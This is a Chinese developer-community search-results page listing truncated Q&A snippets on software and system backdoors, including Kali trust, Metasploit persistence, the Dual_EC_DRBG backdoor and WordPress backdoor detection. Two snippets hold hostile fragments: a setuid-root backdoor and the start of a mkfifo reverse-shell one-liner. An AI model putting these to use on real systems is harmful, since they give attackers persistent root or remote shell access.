腾讯云
开发者社区
文档
建议反馈
控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
登录/注册
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
2
回答
在企业环境中使用Kali
Linux
安全吗?
metasploit
、
kali-linux
Kali
Linux
是否包含经过审核的软件,该软件旨在帮助安全性,并且基本上不包含任何
后门
?Kali
Linux
有一些
后门
的历史吗?还是允许第三方访问经过审计的系统?
浏览 0
提问于2016-10-27
得票数 0
回答已采纳
2
回答
本地文件包含(后期开发)
windows
、
sensitive-data-exposure
、
file-inclusion
我很好奇应该在Windows服务器上查找哪种类型的敏感文件,与
Linux
相比,Windows服务器容易受到LFI的攻击?。我正在寻找可能的利用后的方法,LFI漏洞的网站是托管在Windows服务器上,而不是
Linux
。只是想在不使用外部
后门
或
工具
( )的情
浏览 0
提问于2019-06-09
得票数 1
1
回答
什么是最安全的方式加密一个压缩文件?
server
、
encryption
、
gnupg
、
zip
我想对
Linux
中的zip文件进行加密,这样就没有人可以用任何
工具
打开或解密它。我的意思是使用没有漏洞或
后门
的加密。GnuPG加密是最好的解决方案吗? 提前谢谢。
浏览 0
提问于2017-11-01
得票数 0
回答已采纳
2
回答
后门
怎么走?
windows
、
linux
、
backdoor
、
root
我研究了一下,我感到惊讶的是,在我扎根之后,把一台
Linux
机器
后门
是多么容易。0,0,0);}chown root:root backdoor因此,现在,任何用户都可以使用
后门
作为/backdoor whoami在获得root等效(NT AUTHORITY\SYSTEM)之后,我如
浏览 0
提问于2022-11-09
得票数 -1
1
回答
谁使用RSA BSAFE库?
random-number-generator
、
implementation
、
backdoors
、
nsa
当然,Dual_EC_DRBG是怀疑有国安局的
后门
算法。在此之前,密码专家曾暗示可能没有人使用Dual_EC_DRBG,因此怀疑
后门
可能没有多少实际影响;然而,关于BSAFE库的这个消息表明,我们可能需要重新
检查
这个结论。特别是,Dual_EC_DRBG
后门
中的任何
后门
可能会影响使用BSAFE库的任何产品,因此,要评估这个可疑
后门
的影响,有助于更好地了解哪些产品使用BSAFE,有多少产品和多少人依赖BSAFE进行加密。一个影响一些内部企业
工具
的问题和一些影响到每天数百万
浏览 0
提问于2013-09-16
得票数 5
3
回答
如果
Linux
允许来自公众的开源贡献,它如何是安全的?
malware
、
linux
、
operating-systems
、
backdoor
、
opensource
根据我对
Linux
的简要了解,来自世界各地的开发人员提交的代码将包含在
Linux
更新中。然后由安全管理员对其进行审查。一旦获得批准,它就会传递给
Linux
的创始人Linus,以获得他的最终批准。由于所有这些代码都是由世界各地不知名的开发人员提交的,安全管理员如何确保没有向操作系统添加任何
后门
脚本?不是有1500万行代码吗?操作系统的管理员是否真的理解每一行代码,并确信人们没有提交可能破坏系统的东西,如恶意软件、
后门
或间谍软件?
浏览 0
提问于2018-05-12
得票数 7
1
回答
对于
Linux
,是否有相当于meterpreter的“运行持久性”?
metasploit
与问题一样,我如何在
Linux
目标上安装带有Metasploit的持久
后门
?
浏览 0
提问于2015-07-27
得票数 2
1
回答
我应该在C和GTK+中使用线程来为
后门
创建图形用户界面控制器吗?
c
、
multithreading
、
user-interface
、
gtk
、
gdk
场景: 我用C语言为
Linux
编写了一个CLI
后门
和一个CLI控制器。我正在使用Glade和GTK+3为控制器创建一个图形用户界面。我希望控制器(基本上是一个具有反向功能的服务器)始终接受来自
后门
(具有反向功能的客户端)的连接。同时,我希望将控制器中TextBuffer小部件上编写的命令发送到
后门
,并将接收到的输出写回
后门
。
浏览 4
提问于2020-06-23
得票数 1
2
回答
OpsHub和要求映射100%的TFS用户-不能满足要求
azure-devops
、
opshub
我不会为了将用户从OpsHub
工具
中的映射需求
检查
中删除而将它们从TFS中删除。我已经选择了一个要迁移的特定项目。我已经映射了我正在尝试迁移的项目的所有用户,但该
工具
阻止我继续,因为TFS DefaultCollection中的100%用户都没有映射。 有
后门
吗?我不相信我能够满足这个要求,但我需要能够继续。
浏览 2
提问于2015-09-10
得票数 0
5
回答
如何
检查
后门
代码?
audit
、
code-review
我有一个代码库,需要一个代码审查来评估它的
后门
。 代码太大了,无法
检查
所有的代码,您建议如何处理这个问题。
浏览 0
提问于2011-05-10
得票数 9
回答已采纳
1
回答
怎么才能上传
后门
?
wordpress
我正在
检查
一个Wordpress网站的客户端,我发现一些
后门
在webroot文件夹中存在。攻击者上传
后门
的方式有哪些?
浏览 0
提问于2014-11-05
得票数 -1
1
回答
如何找到有
后门
登录代码的WordPress站点
plugins
、
login
、
security
而且许多插件都有一些
后门
登录尝试。所以,不能相信哪个插件是正确的使用。如何找到
后门
登录问题?请不要投反对票。因为我需要可能的方法来防止
后门
登录问题。我希望这将有助于其他人,谁感染了
后门
登录。因为,许多自由职业者在把它交给网站所有者的时候,会通过
后门
登录。
浏览 0
提问于2015-11-21
得票数 -3
1
回答
我看到两个根用户(Ubuntu)
ubuntu
、
ubuntu-16.04
我并不是
linux
中最聪明的(这就是为什么我买了一个VPS,所以我可以学习),我以为它是某种
后门
,尽管我宁愿由你们来验证,他们知道我是否应该删除它。这是一个图片:。如果你们能告诉我这是不是
后门
那就太好了,谢谢!
浏览 3
提问于2017-08-15
得票数 0
回答已采纳
3
回答
如何在VLSI设计中实现寄存器的
后门
访问?
system-verilog
、
uvm
该方法的一个主要特点是‘
后门
访问’,它可以在零仿真时间内访问(即读取或写入)任何RTL寄存器。
后门
访问机制使用分层的HDL路径来实现。 问题是硅上的物理规定使这种零时间访问成为可能?
浏览 7
提问于2015-09-08
得票数 2
1
回答
Ubuntu软件(商店/应用程序)-总是安全的?
software-installation
我是Ubuntu的新人。我的第一台笔记本电脑运行了Ubuntu。绝对喜欢它,但我有一个问题,当我开始应用- Ubuntu软件-在哪里我可以浏览或看到编辑的选择,所有的软件在这里审查?我是否需要担心这里列出的潜在恶意软件? 蒂娅!
浏览 0
提问于2021-01-03
得票数 1
回答已采纳
3
回答
肯·汤普森的编译器黑客
python
、
source-code
、
trust
、
backdoor
、
code-review
我已经看过肯·汤普森的编译文件了;我们就不能看看编译器的源代码,看看有没有
后门
,这篇文章的重点是什么? 如果我们
检查
语言的最新源代码(如Python或PHP ),我们能确定没有
后门
吗?
浏览 0
提问于2019-02-06
得票数 4
回答已采纳
1
回答
蓝精灵
工具
包怎么可能?
mobile
、
tools
我们可能都听说过蓝精灵
工具
包了。这是由爱德华·斯诺登透露的GCHQ窃听电话的方式。这样他们就可以接管你的手机了(甚至断电!)只需发送加密的短信。我很好奇这是怎么可能的,因为虽然iOS是封闭的源代码,而且可能有
后门
,但是Android是完全开放的,那么这是否意味着在android的代码中也有同样的
后门
呢?
浏览 0
提问于2015-10-15
得票数 2
回答已采纳
1
回答
Eclipse中的Tomcat服务器:目标目录中的war没有正确部署
java
、
eclipse
、
maven
、
tomcat
、
m2eclipse
变量
后门
的值在配置文件dev中等于true。dev.properties我使用Resource.getBundle()检索app.open.backdoor的值 我解压缩war文件以查看configuration.propertiesconfigura
浏览 6
提问于2020-09-21
得票数 0
1
回答
软件
后门
的风险
risk
从肯·汤普森的图灵奖演讲“信任思考”开始,软件
后门
的风险就很明显了。当然,这也适用于硬件。 限制我们在这里的软件,什么是真正好的解决方案,以防止
后门
?由于最近媒体关于国家对全球互联网监控的某些报道,人们对注定要保护IT安全的软件中潜在
后门
的担忧再次浮出水面,例如在http://www.golem.de/news/prism-skandal-furcht-vor-hintertueren-in-us-software-und-hardware
浏览 0
提问于2013-07-03
得票数 0
1
回答
可以借到Netcat的侦听器吗?
tcp
、
backdoor
我一直在使用专门的软件或恶意命令进入备份计算机和服务器,这些命令会在目标计算机上产生
后门
,然后将终端传输到我服务器上的侦听netcat会话。我想知道是否有可能在使用Netcat监听端口的服务器上产生
后门
。最好是
Linux
机器。然后说他在等
后门
在受害者的机器上产卵。受害者会在他的
Linux
机器上运行一些命令,比如: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1
浏览 0
提问于2017-03-14
得票数 1
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
Linux后门整理合集
Chaos:Linux后门卷土重来
burp trick;Retile:LKM Linux rootkit和后门
屌丝绅士-后门捆绑工具-shellter
Chromebackdoor-浏览器后门工具
活动推荐
运营活动
广告
关闭
领券